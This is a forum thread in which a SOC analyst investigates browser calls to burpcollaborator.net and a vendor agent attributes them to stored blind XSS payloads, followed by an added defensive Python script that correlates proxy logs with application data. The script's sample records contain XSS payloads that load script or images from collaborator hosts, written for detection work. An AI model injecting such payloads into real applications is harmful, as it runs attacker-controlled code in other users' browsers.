Burp Suite User Forum

Call to xxxxxx.burpcollaborator.net in corporate proxies logs from browsers

FTR | Last updated: Apr 02, 2019 07:55AM UTC

Hello, I work in a SOC, and I recently discovered calls to xxxxxx.burpcollaborator.net (about 6 subdomains) in our proxy logs. When I looked in the Nexthink logs, I could see that all the requests came from browsers and not Burp Suite. Since we don't intercept SSL I can't see what the referer is, but is it possible that a site initiates requests to burpcollaborator? If yes, in which scenario can we see that kind of request? Thanks for your help to understand what's going on.

PortSwigger Agent | Last updated: Apr 02, 2019 09:39AM UTC

Did you check the User-Agent header to determine requests came from browsers? If so, be aware that Burp uses the same header as Chrome 69 on Windows by default. So the requests could be from Burp. Another reason this can happen is that during a Burp scan, blind XSS payloads are submitted, and you could be witnessing later execution of these payloads by another user who browses the site. Without the referer this will be difficult to follow up in a SOC, but you could contact the relevant user to inquire if they're using Burp.

Burp User | Last updated: Apr 02, 2019 09:56AM UTC

Hello, thanks a lot for your feedback. I have 3 users, none of them even understand what Burp is, and there's no way that they use it. I contacted all of them, and their technical IT skills are low. I used Nexthink to check what process is doing the request, and it's Chrome or Firefox. Then I checked in the proxy logs, and found out that the user agent is the same as for "regular" web surfing from this user. The only common point between these 3 users is that they are working in the same services, and use the same tools (which is a famous DMP pure player). Is it possible that some use burpcollaborator.net in another way than using Burp Suite? Thanks again.

PortSwigger Agent | Last updated: Apr 02, 2019 10:20AM UTC

Hi, in that case, it's highly likely one of the web apps they work with has a blind XSS vulnerability, and someone has scanned this using Burp and the blind XSS payloads have been injected. That person could be an authorized pen tester, or is potentially a malicious - or, at least, unauthorized - user of your services. If it's possible to search the app's data for the string "burpcollaborator.net" this could identify where this has happened. Alternatively, if you can turn on referrer logging for these users (perhaps using a logging browser extension), that may identify where the requests are being triggered.
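The follow-up suggested in the last reply, sketched as an added example that is not part of the original thread: it pulls the burpcollaborator.net hostnames out of proxy CONNECT lines, searches exported application records for the same string (peeling URL and HTML encoding first), and links each stored value to the clients that later contacted that hostname. The log layout, record fields, IP addresses and hostnames are constructed assumptions.

```python
import re
from collections import defaultdict
from html import unescape
from urllib.parse import unquote

# Any hostname under burpcollaborator.net, the domain named in the thread.
COLLAB_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+burpcollaborator\.net)\b", re.I)

# Constructed proxy lines in an assumed "time client METHOD target" layout.
# Without TLS interception only the CONNECT host is visible.
PROXY_LOG = """\
2019-04-01T09:12:03Z 10.0.4.17 CONNECT abc123example.burpcollaborator.net:443
2019-04-01T09:12:04Z 10.0.4.17 CONNECT www.example.com:443
2019-04-01T10:40:51Z 10.0.4.22 CONNECT abc123example.burpcollaborator.net:443
2019-04-01T11:02:10Z 10.0.4.30 CONNECT def456example.burpcollaborator.net:443
"""

# Constructed export of application records (hypothetical field names).
APP_RECORDS = [
    {"id": 101, "name": "Spring campaign", "notes": "ok"},
    {"id": 102, "name": "<script src=//abc123example.burpcollaborator.net></script>", "notes": ""},
    {"id": 103, "name": "Q2", "notes": "%3Cimg%20src%3Dhttps%3A%2F%2Fdef456example.burpcollaborator.net%2Fx%3E"},
]

def hosts_in(text):
    """Return collaborator hostnames in text after peeling URL/HTML encoding."""
    for _ in range(3):  # at most three layers of encoding
        decoded = unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return {h.lower() for h in COLLAB_RE.findall(text)}

def clients_by_host(log):
    """Map each collaborator hostname in the proxy log to the client IPs that requested it."""
    seen = defaultdict(set)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 4:
            for host in hosts_in(parts[3]):
                seen[host].add(parts[1])
    return dict(seen)

def correlate(log, records):
    """List (record id, field, hostname, clients) for every stored value naming a collaborator host."""
    clients = clients_by_host(log)
    return [(rec["id"], field, host, sorted(clients.get(host, ())))
            for rec in records for field, value in rec.items()
            if isinstance(value, str) for host in sorted(hosts_in(value))]
```

A record that matches but has an empty client list means the stored value has not yet been rendered by any logged client; it still marks where the injection landed.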